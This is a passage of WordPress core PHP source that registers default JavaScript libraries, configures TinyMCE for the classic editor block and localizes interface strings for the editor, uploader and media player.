/* translators: One minute from or to a particular datetime, e.g., "a minute ago" or "a minute from now". */
'm' => __( 'a minute' ),
/* translators: %d: Duration in minutes from or to a particular datetime, e.g., "4 minutes ago" or "4 minutes from now". */
'mm' => __( '%d minutes' ),
/* translators: One hour from or to a particular datetime, e.g., "an hour ago" or "an hour from now". */
'h' => __( 'an hour' ),
/* translators: %d: Duration in hours from or to a particular datetime, e.g., "4 hours ago" or "4 hours from now". */
'hh' => __( '%d hours' ),
/* translators: One day from or to a particular datetime, e.g., "a day ago" or "a day from now". */
'd' => __( 'a day' ),
/* translators: %d: Duration in days from or to a particular datetime, e.g., "4 days ago" or "4 days from now". */
'dd' => __( '%d days' ),
/* translators: One month from or to a particular datetime, e.g., "a month ago" or "a month from now". */
'M' => __( 'a month' ),
/* translators: %d: Duration in months from or to a particular datetime, e.g., "4 months ago" or "4 months from now". */
'MM' => __( '%d months' ),
/* translators: One year from or to a particular datetime, e.g., "a year ago" or "a year from now". */
'y' => __( 'a year' ),
/* translators: %d: Duration in years from or to a particular datetime, e.g., "4 years ago" or "4 years from now". */
'yy' => __( '%d years' ),
),
'startOfWeek' => (int) get_option( 'start_of_week', 0 ),
),
'formats' => array(
/* translators: Time format, see https://www.php.net/manual/datetime.format.php */
'time' => get_option( 'time_format', __( 'g:i a' ) ),
/* translators: Date format, see https://www.php.net/manual/datetime.format.php */
'date' => get_option( 'date_format', __( 'F j, Y' ) ),
/* translators: Date/Time format, see https://www.php.net/manual/datetime.format.php */
'datetime' => __( 'F j, Y g:i a' ),
/* translators: Abbreviated date/time format, see https://www.php.net/manual/datetime.format.php */
'datetimeAbbreviated' => __( 'M j, Y g:i a' ),
),
'timezone' => array(
'offset' => (float) $gmt_offset,
'offsetFormatted' => str_replace( array( '.25', '.5', '.75' ), array( ':15', ':30', ':45' ), (string) $gmt_offset ),
'string' => $timezone_string,
'abbr' => $timezone_abbr,
),
),
JSON_HEX_TAG | JSON_UNESCAPED_SLASHES
)
),
'after'
);
// Loading the old editor and its config to ensure the classic block works as expected.
$scripts->add_inline_script(
'editor',
'window.wp.oldEditor = window.wp.editor;',
'after'
);
/*
* wp-editor module is exposed as window.wp.editor.
* Problem: there is quite some code expecting window.wp.oldEditor object available under window.wp.editor.
* Solution: fuse the two objects together to maintain backward compatibility.
* For more context, see https://github.com/WordPress/gutenberg/issues/33203.
*/
$scripts->add_inline_script(
'wp-editor',
'Object.assign( window.wp.editor, window.wp.oldEditor );',
'after'
);
}
/**
* Adds inline scripts required for the TinyMCE in the block editor.
*
* These TinyMCE init settings are used to extend and override the default settings
* from `_WP_Editors::default_settings()` for the Classic block.
*
* @since 5.0.0
*
* @global WP_Scripts $wp_scripts
*/
function wp_tinymce_inline_scripts() {
global $wp_scripts;
/** This filter is documented in wp-includes/class-wp-editor.php */
$editor_settings = apply_filters( 'wp_editor_settings', array( 'tinymce' => true ), 'classic-block' );
$tinymce_plugins = array(
'charmap',
'colorpicker',
'hr',
'lists',
'media',
'paste',
'tabfocus',
'textcolor',
'fullscreen',
'wordpress',
'wpautoresize',
'wpeditimage',
'wpemoji',
'wpgallery',
'wplink',
'wpdialogs',
'wptextpattern',
'wpview',
);
/** This filter is documented in wp-includes/class-wp-editor.php */
$tinymce_plugins = apply_filters( 'tiny_mce_plugins', $tinymce_plugins, 'classic-block' );
$tinymce_plugins = array_unique( $tinymce_plugins );
$disable_captions = false;
// Runs after `tiny_mce_plugins` but before `mce_buttons`.
/** This filter is documented in wp-admin/includes/media.php */
if ( apply_filters( 'disable_captions', '' ) ) {
$disable_captions = true;
}
$toolbar1 = array(
'formatselect',
'bold',
'italic',
'bullist',
'numlist',
'blockquote',
'alignleft',
'aligncenter',
'alignright',
'link',
'unlink',
'wp_more',
'spellchecker',
'wp_add_media',
'wp_adv',
);
/** This filter is documented in wp-includes/class-wp-editor.php */
$toolbar1 = apply_filters( 'mce_buttons', $toolbar1, 'classic-block' );
$toolbar2 = array(
'strikethrough',
'hr',
'forecolor',
'pastetext',
'removeformat',
'charmap',
'outdent',
'indent',
'undo',
'redo',
'wp_help',
);
/** This filter is documented in wp-includes/class-wp-editor.php */
$toolbar2 = apply_filters( 'mce_buttons_2', $toolbar2, 'classic-block' );
/** This filter is documented in wp-includes/class-wp-editor.php */
$toolbar3 = apply_filters( 'mce_buttons_3', array(), 'classic-block' );
/** This filter is documented in wp-includes/class-wp-editor.php */
$toolbar4 = apply_filters( 'mce_buttons_4', array(), 'classic-block' );
/** This filter is documented in wp-includes/class-wp-editor.php */
$external_plugins = apply_filters( 'mce_external_plugins', array(), 'classic-block' );
$tinymce_settings = array(
'plugins' => implode( ',', $tinymce_plugins ),
'toolbar1' => implode( ',', $toolbar1 ),
'toolbar2' => implode( ',', $toolbar2 ),
'toolbar3' => implode( ',', $toolbar3 ),
'toolbar4' => implode( ',', $toolbar4 ),
'external_plugins' => wp_json_encode( $external_plugins ),
'classic_block_editor' => true,
);
if ( $disable_captions ) {
$tinymce_settings['wpeditimage_disable_captions'] = true;
}
if ( ! empty( $editor_settings['tinymce'] ) && is_array( $editor_settings['tinymce'] ) ) {
$tinymce_settings = array_merge( $tinymce_settings, $editor_settings['tinymce'] );
}
/** This filter is documented in wp-includes/class-wp-editor.php */
$tinymce_settings = apply_filters( 'tiny_mce_before_init', $tinymce_settings, 'classic-block' );
/*
* Do "by hand" translation from PHP array to js object.
* Prevents breakage in some custom settings.
*/
$init_obj = '';
foreach ( $tinymce_settings as $key => $value ) {
if ( is_bool( $value ) ) {
$val = $value ? 'true' : 'false';
$init_obj .= $key . ':' . $val . ',';
continue;
} elseif ( ! empty( $value ) && is_string( $value ) && (
( '{' === $value[0] && '}' === $value[ strlen( $value ) - 1 ] ) ||
( '[' === $value[0] && ']' === $value[ strlen( $value ) - 1 ] ) ||
preg_match( '/^\(?function ?\(/', $value ) ) ) {
$init_obj .= $key . ':' . $value . ',';
continue;
}
$init_obj .= $key . ':"' . $value . '",';
}
$init_obj = '{' . trim( $init_obj, ' ,' ) . '}';
$script = 'window.wpEditorL10n = {
tinymce: {
baseURL: ' . wp_json_encode( includes_url( 'js/tinymce' ), JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ) . ',
suffix: ' . ( SCRIPT_DEBUG ? '""' : '".min"' ) . ',
settings: ' . $init_obj . ',
}
}';
$wp_scripts->add_inline_script( 'wp-block-library', $script, 'before' );
}
/**
* Registers all the WordPress packages scripts.
*
* @since 5.0.0
*
* @param WP_Scripts $scripts WP_Scripts object.
*/
function wp_default_packages( $scripts ) {
wp_default_packages_vendor( $scripts );
wp_register_development_scripts( $scripts );
wp_register_tinymce_scripts( $scripts );
wp_default_packages_scripts( $scripts );
if ( did_action( 'init' ) ) {
wp_default_packages_inline_scripts( $scripts );
}
}
/**
* Returns the suffix that can be used for the scripts.
*
* There are two suffix types, the normal one and the dev suffix.
*
* @since 5.0.0
*
* @param string $type The type of suffix to retrieve.
* @return string The script suffix.
*/
function wp_scripts_get_suffix( $type = '' ) {
static $suffixes;
if ( null === $suffixes ) {
/*
* Include an unmodified $wp_version.
*
* Note: wp_get_wp_version() is not used here, as this file can be included
* via wp-admin/load-scripts.php or wp-admin/load-styles.php, in which case
* wp-includes/functions.php is not loaded.
*/
require ABSPATH . WPINC . '/version.php';
/*
* Note: str_contains() is not used here, as this file can be included
* via wp-admin/load-scripts.php or wp-admin/load-styles.php, in which case
* the polyfills from wp-includes/compat.php are not loaded.
*/
$develop_src = false !== strpos( $wp_version, '-src' );
if ( ! defined( 'SCRIPT_DEBUG' ) ) {
define( 'SCRIPT_DEBUG', $develop_src );
}
$suffix = SCRIPT_DEBUG ? '' : '.min';
$dev_suffix = $develop_src ? '' : '.min';
$suffixes = array(
'suffix' => $suffix,
'dev_suffix' => $dev_suffix,
);
}
if ( 'dev' === $type ) {
return $suffixes['dev_suffix'];
}
return $suffixes['suffix'];
}
/**
* Registers all WordPress scripts.
*
* Localizes some of them.
* args order: `$scripts->add( 'handle', 'url', 'dependencies', 'query-string', 1 );`
* when last arg === 1 queues the script for the footer
*
* @since 2.6.0
*
* @param WP_Scripts $scripts WP_Scripts object.
*/
function wp_default_scripts( $scripts ) {
$suffix = wp_scripts_get_suffix();
$dev_suffix = wp_scripts_get_suffix( 'dev' );
$guessurl = site_url();
if ( ! $guessurl ) {
$guessed_url = true;
$guessurl = wp_guess_url();
}
$scripts->base_url = $guessurl;
$scripts->content_url = defined( 'WP_CONTENT_URL' ) ? WP_CONTENT_URL : '';
$scripts->default_version = get_bloginfo( 'version' );
$scripts->default_dirs = array( '/wp-admin/js/', '/wp-includes/js/' );
$scripts->add( 'utils', "/wp-includes/js/utils$suffix.js" );
did_action( 'init' ) && $scripts->localize(
'utils',
'userSettings',
array(
'url' => (string) SITECOOKIEPATH,
'uid' => (string) get_current_user_id(),
'time' => (string) time(),
'secure' => (string) ( 'https' === parse_url( site_url(), PHP_URL_SCHEME ) ),
)
);
$scripts->add( 'common', "/wp-admin/js/common$suffix.js", array( 'jquery', 'hoverIntent', 'utils', 'wp-a11y' ), false, 1 );
$scripts->set_translations( 'common' );
$bulk_action_observer_ids = array(
'bulk_action' => 'action',
'changeit' => 'new_role',
);
did_action( 'init' ) && $scripts->localize(
'common',
'bulkActionObserverIds',
/**
* Filters the array of field name attributes for bulk actions.
*
* @since 6.8.1
*
* @param array $bulk_action_observer_ids {
* An array of field name attributes for bulk actions.
*
* @type string $bulk_action The bulk action field name. Default 'action'.
* @type string $changeit The new role field name. Default 'new_role'.
* }
*/
apply_filters( 'bulk_action_observer_ids', $bulk_action_observer_ids )
);
$scripts->add( 'wp-sanitize', "/wp-includes/js/wp-sanitize$suffix.js", array(), false, 1 );
$scripts->add( 'sack', "/wp-includes/js/tw-sack$suffix.js", array(), '1.6.1', 1 );
$scripts->add( 'quicktags', "/wp-includes/js/quicktags$suffix.js", array(), false, 1 );
did_action( 'init' ) && $scripts->localize(
'quicktags',
'quicktagsL10n',
array(
'closeAllOpenTags' => __( 'Close all open tags' ),
'closeTags' => __( 'close tags' ),
'enterURL' => __( 'Enter the URL' ),
'enterImageURL' => __( 'Enter the URL of the image' ),
'enterImageDescription' => __( 'Enter a description of the image' ),
'textdirection' => __( 'text direction' ),
'toggleTextdirection' => __( 'Toggle Editor Text Direction' ),
'dfw' => __( 'Distraction-free writing mode' ),
'strong' => __( 'Bold' ),
'strongClose' => __( 'Close bold tag' ),
'em' => __( 'Italic' ),
'emClose' => __( 'Close italic tag' ),
'link' => __( 'Insert link' ),
'blockquote' => __( 'Blockquote' ),
'blockquoteClose' => __( 'Close blockquote tag' ),
'del' => __( 'Deleted text (strikethrough)' ),
'delClose' => __( 'Close deleted text tag' ),
'ins' => __( 'Inserted text' ),
'insClose' => __( 'Close inserted text tag' ),
'image' => __( 'Insert image' ),
'ul' => __( 'Bulleted list' ),
'ulClose' => __( 'Close bulleted list tag' ),
'ol' => __( 'Numbered list' ),
'olClose' => __( 'Close numbered list tag' ),
'li' => __( 'List item' ),
'liClose' => __( 'Close list item tag' ),
'code' => __( 'Code' ),
'codeClose' => __( 'Close code tag' ),
'more' => __( 'Insert Read More tag' ),
)
);
$scripts->add( 'colorpicker', "/wp-includes/js/colorpicker$suffix.js", array( 'prototype' ), '3517m' );
$scripts->add( 'editor', "/wp-admin/js/editor$suffix.js", array( 'utils', 'jquery' ), false, 1 );
$scripts->add( 'clipboard', "/wp-includes/js/clipboard$suffix.js", array(), '2.0.11', 1 );
$scripts->add( 'wp-ajax-response', "/wp-includes/js/wp-ajax-response$suffix.js", array( 'jquery', 'wp-a11y' ), false, 1 );
did_action( 'init' ) && $scripts->localize(
'wp-ajax-response',
'wpAjax',
array(
'noPerm' => __( 'Sorry, you are not allowed to do that.' ),
'broken' => __( 'An error occurred while processing your request. Please try again later.' ),
)
);
$scripts->add( 'wp-api-request', "/wp-includes/js/api-request$suffix.js", array( 'jquery' ), false, 1 );
// `wpApiSettings` is also used by `wp-api`, which depends on this script.
did_action( 'init' ) && $scripts->localize(
'wp-api-request',
'wpApiSettings',
array(
'root' => sanitize_url( get_rest_url() ),
'nonce' => wp_installing() ? '' : wp_create_nonce( 'wp_rest' ),
'versionString' => 'wp/v2/',
)
);
$scripts->add( 'wp-pointer', "/wp-includes/js/wp-pointer$suffix.js", array( 'jquery-ui-core' ), false, 1 );
$scripts->set_translations( 'wp-pointer' );
$scripts->add( 'autosave', "/wp-includes/js/autosave$suffix.js", array( 'heartbeat' ), false, 1 );
$scripts->add( 'heartbeat', "/wp-includes/js/heartbeat$suffix.js", array( 'jquery', 'wp-hooks' ), false, 1 );
did_action( 'init' ) && $scripts->localize(
'heartbeat',
'heartbeatSettings',
/**
* Filters the Heartbeat settings.
*
* @since 3.6.0
*
* @param array $settings Heartbeat settings array.
*/
apply_filters( 'heartbeat_settings', array() )
);
$scripts->add( 'wp-auth-check', "/wp-includes/js/wp-auth-check$suffix.js", array( 'heartbeat' ), false, 1 );
$scripts->set_translations( 'wp-auth-check' );
$scripts->add( 'wp-lists', "/wp-includes/js/wp-lists$suffix.js", array( 'wp-ajax-response', 'jquery-color' ), false, 1 );
$scripts->add( 'site-icon', '/wp-admin/js/site-icon.js', array( 'jquery' ), false, 1 );
$scripts->set_translations( 'site-icon' );
// WordPress no longer uses or bundles Prototype or script.aculo.us. These are now pulled from an external source.
$scripts->add( 'prototype', 'https://ajax.googleapis.com/ajax/libs/prototype/1.7.1.0/prototype.js', array(), '1.7.1' );
$scripts->add( 'scriptaculous-root', 'https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/scriptaculous.js', array( 'prototype' ), '1.9.0' );
$scripts->add( 'scriptaculous-builder', 'https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/builder.js', array( 'scriptaculous-root' ), '1.9.0' );
$scripts->add( 'scriptaculous-dragdrop', 'https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/dragdrop.js', array( 'scriptaculous-builder', 'scriptaculous-effects' ), '1.9.0' );
$scripts->add( 'scriptaculous-effects', 'https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/effects.js', array( 'scriptaculous-root' ), '1.9.0' );
$scripts->add( 'scriptaculous-slider', 'https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/slider.js', array( 'scriptaculous-effects' ), '1.9.0' );
$scripts->add( 'scriptaculous-sound', 'https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/sound.js', array( 'scriptaculous-root' ), '1.9.0' );
$scripts->add( 'scriptaculous-controls', 'https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/controls.js', array( 'scriptaculous-root' ), '1.9.0' );
$scripts->add( 'scriptaculous', false, array( 'scriptaculous-dragdrop', 'scriptaculous-slider', 'scriptaculous-controls' ) );
// Not used in core, replaced by Jcrop.js.
$scripts->add( 'cropper', '/wp-includes/js/crop/cropper.js', array( 'scriptaculous-dragdrop' ) );
/*
* jQuery.
* The unminified jquery.js and jquery-migrate.js are included to facilitate debugging.
*/
$scripts->add( 'jquery', false, array( 'jquery-core', 'jquery-migrate' ), '3.7.1' );
$scripts->add( 'jquery-core', "/wp-includes/js/jquery/jquery$suffix.js", array(), '3.7.1' );
$scripts->add( 'jquery-migrate', "/wp-includes/js/jquery/jquery-migrate$suffix.js", array(), '3.4.1' );
/*
* Full jQuery UI.
* The build process in 1.12.1 has changed significantly.
* In order to keep backwards compatibility, and to keep the optimized loading,
* the source files were flattened and included with some modifications for AMD loading.
* A notable change is that 'jquery-ui-core' now contains 'jquery-ui-position' and 'jquery-ui-widget'.
*/
$scripts->add( 'jquery-ui-core', "/wp-includes/js/jquery/ui/core$suffix.js", array( 'jquery' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-core', "/wp-includes/js/jquery/ui/effect$suffix.js", array( 'jquery' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-blind', "/wp-includes/js/jquery/ui/effect-blind$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-bounce', "/wp-includes/js/jquery/ui/effect-bounce$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-clip', "/wp-includes/js/jquery/ui/effect-clip$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-drop', "/wp-includes/js/jquery/ui/effect-drop$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-explode', "/wp-includes/js/jquery/ui/effect-explode$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-fade', "/wp-includes/js/jquery/ui/effect-fade$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-fold', "/wp-includes/js/jquery/ui/effect-fold$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-highlight', "/wp-includes/js/jquery/ui/effect-highlight$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-puff', "/wp-includes/js/jquery/ui/effect-puff$suffix.js", array( 'jquery-effects-core', 'jquery-effects-scale' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-pulsate', "/wp-includes/js/jquery/ui/effect-pulsate$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-scale', "/wp-includes/js/jquery/ui/effect-scale$suffix.js", array( 'jquery-effects-core', 'jquery-effects-size' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-shake', "/wp-includes/js/jquery/ui/effect-shake$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-size', "/wp-includes/js/jquery/ui/effect-size$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-slide', "/wp-includes/js/jquery/ui/effect-slide$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-transfer', "/wp-includes/js/jquery/ui/effect-transfer$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
// Widgets
$scripts->add( 'jquery-ui-accordion', "/wp-includes/js/jquery/ui/accordion$suffix.js", array( 'jquery-ui-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-autocomplete', "/wp-includes/js/jquery/ui/autocomplete$suffix.js", array( 'jquery-ui-menu', 'wp-a11y' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-button', "/wp-includes/js/jquery/ui/button$suffix.js", array( 'jquery-ui-core', 'jquery-ui-controlgroup', 'jquery-ui-checkboxradio' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-datepicker', "/wp-includes/js/jquery/ui/datepicker$suffix.js", array( 'jquery-ui-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-dialog', "/wp-includes/js/jquery/ui/dialog$suffix.js", array( 'jquery-ui-resizable', 'jquery-ui-draggable', 'jquery-ui-button' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-menu', "/wp-includes/js/jquery/ui/menu$suffix.js", array( 'jquery-ui-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-mouse', "/wp-includes/js/jquery/ui/mouse$suffix.js", array( 'jquery-ui-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-progressbar', "/wp-includes/js/jquery/ui/progressbar$suffix.js", array( 'jquery-ui-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-selectmenu', "/wp-includes/js/jquery/ui/selectmenu$suffix.js", array( 'jquery-ui-menu' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-slider', "/wp-includes/js/jquery/ui/slider$suffix.js", array( 'jquery-ui-mouse' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-spinner', "/wp-includes/js/jquery/ui/spinner$suffix.js", array( 'jquery-ui-button' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-tabs', "/wp-includes/js/jquery/ui/tabs$suffix.js", array( 'jquery-ui-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-tooltip', "/wp-includes/js/jquery/ui/tooltip$suffix.js", array( 'jquery-ui-core' ), '1.13.3', 1 );
// New in 1.12.1
$scripts->add( 'jquery-ui-checkboxradio', "/wp-includes/js/jquery/ui/checkboxradio$suffix.js", array( 'jquery-ui-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-controlgroup', "/wp-includes/js/jquery/ui/controlgroup$suffix.js", array( 'jquery-ui-core' ), '1.13.3', 1 );
// Interactions
$scripts->add( 'jquery-ui-draggable', "/wp-includes/js/jquery/ui/draggable$suffix.js", array( 'jquery-ui-mouse' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-droppable', "/wp-includes/js/jquery/ui/droppable$suffix.js", array( 'jquery-ui-draggable' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-resizable', "/wp-includes/js/jquery/ui/resizable$suffix.js", array( 'jquery-ui-mouse' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-selectable', "/wp-includes/js/jquery/ui/selectable$suffix.js", array( 'jquery-ui-mouse' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-sortable', "/wp-includes/js/jquery/ui/sortable$suffix.js", array( 'jquery-ui-mouse' ), '1.13.3', 1 );
/*
* As of 1.12.1 `jquery-ui-position` and `jquery-ui-widget` are part of `jquery-ui-core`.
* Listed here for back-compat.
*/
$scripts->add( 'jquery-ui-position', false, array( 'jquery-ui-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-widget', false, array( 'jquery-ui-core' ), '1.13.3', 1 );
// Deprecated, not used in core, most functionality is included in jQuery 1.3.
$scripts->add( 'jquery-form', "/wp-includes/js/jquery/jquery.form$suffix.js", array( 'jquery' ), '4.3.0', 1 );
// jQuery plugins.
$scripts->add( 'jquery-color', '/wp-includes/js/jquery/jquery.color.min.js', array( 'jquery' ), '3.0.0', 1 );
$scripts->add( 'schedule', '/wp-includes/js/jquery/jquery.schedule.js', array( 'jquery' ), '20m', 1 );
$scripts->add( 'jquery-query', '/wp-includes/js/jquery/jquery.query.js', array( 'jquery' ), '2.2.3', 1 );
$scripts->add( 'jquery-serialize-object', '/wp-includes/js/jquery/jquery.serialize-object.js', array( 'jquery' ), '0.2-wp', 1 );
$scripts->add( 'jquery-hotkeys', "/wp-includes/js/jquery/jquery.hotkeys$suffix.js", array( 'jquery' ), '0.0.2m', 1 );
$scripts->add( 'jquery-table-hotkeys', "/wp-includes/js/jquery/jquery.table-hotkeys$suffix.js", array( 'jquery', 'jquery-hotkeys' ), false, 1 );
$scripts->add( 'jquery-touch-punch', '/wp-includes/js/jquery/jquery.ui.touch-punch.js', array( 'jquery-ui-core', 'jquery-ui-mouse' ), '0.2.2', 1 );
// Not used any more, registered for backward compatibility.
$scripts->add( 'suggest', "/wp-includes/js/jquery/suggest$suffix.js", array( 'jquery' ), '1.1-20110113', 1 );
/*
* Masonry v2 depended on jQuery. v3 does not. The older jquery-masonry handle is a shiv.
* It sets jQuery as a dependency, as the theme may have been implicitly loading it this way.
*/
$scripts->add( 'imagesloaded', '/wp-includes/js/imagesloaded.min.js', array(), '5.0.0', 1 );
$scripts->add( 'masonry', '/wp-includes/js/masonry.min.js', array( 'imagesloaded' ), '4.2.2', 1 );
$scripts->add( 'jquery-masonry', '/wp-includes/js/jquery/jquery.masonry.min.js', array( 'jquery', 'masonry' ), '3.1.2b', 1 );
$scripts->add( 'thickbox', '/wp-includes/js/thickbox/thickbox.js', array( 'jquery' ), '3.1-20121105', 1 );
did_action( 'init' ) && $scripts->localize(
'thickbox',
'thickboxL10n',
array(
'next' => __( 'Next >' ),
'prev' => __( '< Prev' ),
'image' => __( 'Image' ),
'of' => __( 'of' ),
'close' => __( 'Close' ),
'noiframes' => __( 'This feature requires inline frames. You have iframes disabled or your browser does not support them.' ),
'loadingAnimation' => includes_url( 'js/thickbox/loadingAnimation.gif' ),
)
);
// Not used in core, replaced by imgAreaSelect.
$scripts->add( 'jcrop', '/wp-includes/js/jcrop/jquery.Jcrop.min.js', array( 'jquery' ), '0.9.15' );
// Error messages for Plupload.
$uploader_l10n = array(
'queue_limit_exceeded' => __( 'You have attempted to queue too many files.' ),
/* translators: %s: File name. */
'file_exceeds_size_limit' => __( '%s exceeds the maximum upload size for this site.' ),
'zero_byte_file' => __( 'This file is empty. Please try another.' ),
'invalid_filetype' => __( 'This file cannot be processed by the web server.' ),
'not_an_image' => __( 'This file is not an image. Please try another.' ),
'image_memory_exceeded' => __( 'Memory exceeded. Please try another smaller file.' ),
'image_dimensions_exceeded' => __( 'This is larger than the maximum size. Please try another.' ),
'default_error' => __( 'An error occurred in the upload. Please try again later.' ),
'missing_upload_url' => __( 'There was a configuration error. Please contact the server administrator.' ),
'upload_limit_exceeded' => __( 'You may only upload 1 file.' ),
'http_error' => __( 'Unexpected response from the server. The file may have been uploaded successfully. Check in the Media Library or reload the page.' ),
'http_error_image' => __( 'The server cannot process the image. This can happen if the server is busy or does not have enough resources to complete the task. Uploading a smaller image may help. Suggested maximum size is 2560 pixels.' ),
'upload_failed' => __( 'Upload failed.' ),
/* translators: 1: Opening link tag, 2: Closing link tag. */
'big_upload_failed' => __( 'Please try uploading this file with the %1$sbrowser uploader%2$s.' ),
/* translators: %s: File name. */
'big_upload_queued' => __( '%s exceeds the maximum upload size for the multi-file uploader when used in your browser.' ),
'io_error' => __( 'IO error.' ),
'security_error' => __( 'Security error.' ),
'file_cancelled' => __( 'File canceled.' ),
'upload_stopped' => __( 'Upload stopped.' ),
'dismiss' => __( 'Dismiss' ),
'crunching' => __( 'Crunching…' ),
'deleted' => __( 'moved to the Trash.' ),
/* translators: %s: File name. */
'error_uploading' => __( '“%s” has failed to upload.' ),
'unsupported_image' => __( 'This image cannot be displayed in a web browser. For best results convert it to JPEG before uploading.' ),
'noneditable_image' => __( 'The web server cannot generate responsive image sizes for this image. Convert it to JPEG or PNG before uploading.' ),
'file_url_copied' => __( 'The file URL has been copied to your clipboard' ),
);
$scripts->add( 'moxiejs', "/wp-includes/js/plupload/moxie$suffix.js", array(), '1.3.5.1' );
$scripts->add( 'plupload', "/wp-includes/js/plupload/plupload$suffix.js", array( 'moxiejs' ), '2.1.9' );
// Back compat handles:
foreach ( array( 'all', 'html5', 'flash', 'silverlight', 'html4' ) as $handle ) {
$scripts->add( "plupload-$handle", false, array( 'plupload' ), '2.1.1' );
}
$scripts->add( 'plupload-handlers', "/wp-includes/js/plupload/handlers$suffix.js", array( 'clipboard', 'jquery', 'plupload', 'underscore', 'wp-a11y', 'wp-i18n' ) );
did_action( 'init' ) && $scripts->localize( 'plupload-handlers', 'pluploadL10n', $uploader_l10n );
$scripts->add( 'wp-plupload', "/wp-includes/js/plupload/wp-plupload$suffix.js", array( 'plupload', 'jquery', 'media-models' ), false, 1 );
did_action( 'init' ) && $scripts->localize( 'wp-plupload', 'pluploadL10n', $uploader_l10n );
$scripts->add( 'comment-reply', "/wp-includes/js/comment-reply$suffix.js", array(), false, 1 );
if ( did_action( 'init' ) ) {
$scripts->add_data( 'comment-reply', 'strategy', 'async' );
$scripts->add_data( 'comment-reply', 'fetchpriority', 'low' ); // In Chrome this is automatically low due to the async strategy, but in Firefox and Safari the priority is normal/medium.
}
// Not used in core, obsolete. Registered for backward compatibility.
$scripts->add( 'json2', "/wp-includes/js/json2$suffix.js", array(), '2015-05-03' );
did_action( 'init' ) && $scripts->add_data( 'json2', 'conditional', '_required-conditional-dependency_' );
$scripts->add( 'underscore', "/wp-includes/js/underscore$dev_suffix.js", array(), '1.13.7', 1 );
$scripts->add( 'backbone', "/wp-includes/js/backbone$dev_suffix.js", array( 'underscore', 'jquery' ), '1.6.0', 1 );
$scripts->add( 'wp-util', "/wp-includes/js/wp-util$suffix.js", array( 'underscore', 'jquery' ), false, 1 );
did_action( 'init' ) && $scripts->localize(
'wp-util',
'_wpUtilSettings',
array(
'ajax' => array(
'url' => admin_url( 'admin-ajax.php', 'relative' ),
),
)
);
$scripts->add( 'wp-backbone', "/wp-includes/js/wp-backbone$suffix.js", array( 'backbone', 'wp-util' ), false, 1 );
$scripts->add( 'revisions', "/wp-admin/js/revisions$suffix.js", array( 'wp-backbone', 'jquery-ui-slider', 'hoverIntent' ), false, 1 );
$scripts->add( 'imgareaselect', "/wp-includes/js/imgareaselect/jquery.imgareaselect$suffix.js", array( 'jquery' ), false, 1 );
$scripts->add( 'mediaelement', false, array( 'jquery', 'mediaelement-core', 'mediaelement-migrate' ), '4.2.17', 1 );
$scripts->add( 'mediaelement-core', "/wp-includes/js/mediaelement/mediaelement-and-player$suffix.js", array(), '4.2.17', 1 );
$scripts->add( 'mediaelement-migrate', "/wp-includes/js/mediaelement/mediaelement-migrate$suffix.js", array(), false, 1 );
did_action( 'init' ) && $scripts->add_inline_script(
'mediaelement-core',
sprintf(
'var mejsL10n = %s;',
wp_json_encode(
array(
'language' => strtolower( strtok( determine_locale(), '_-' ) ),
'strings' => array(
'mejs.download-file' => __( 'Download File' ),
'mejs.install-flash' => __( 'You are using a browser that does not have Flash player enabled or installed. Please turn on your Flash player plugin or download the latest version from https://get.adobe.com/flashplayer/' ),
'mejs.fullscreen' => __( 'Fullscreen' ),
'mejs.play' => __( 'Play' ),
'mejs.pause' => __( 'Pause' ),
'mejs.time-slider' => __( 'Time Slider' ),
'mejs.time-help-text' => __( 'Use Left/Right Arrow keys to advance one second, Up/Down arrows to advance ten seconds.' ),
'mejs.live-broadcast' => __( 'Live Broadcast' ),
'mejs.volume-help-text' => __( 'Use Up/Down Arrow keys to increase or decrease volume.' ),
'mejs.unmute' => __( 'Unmute' ),
'mejs.mute' => __( 'Mute' ),
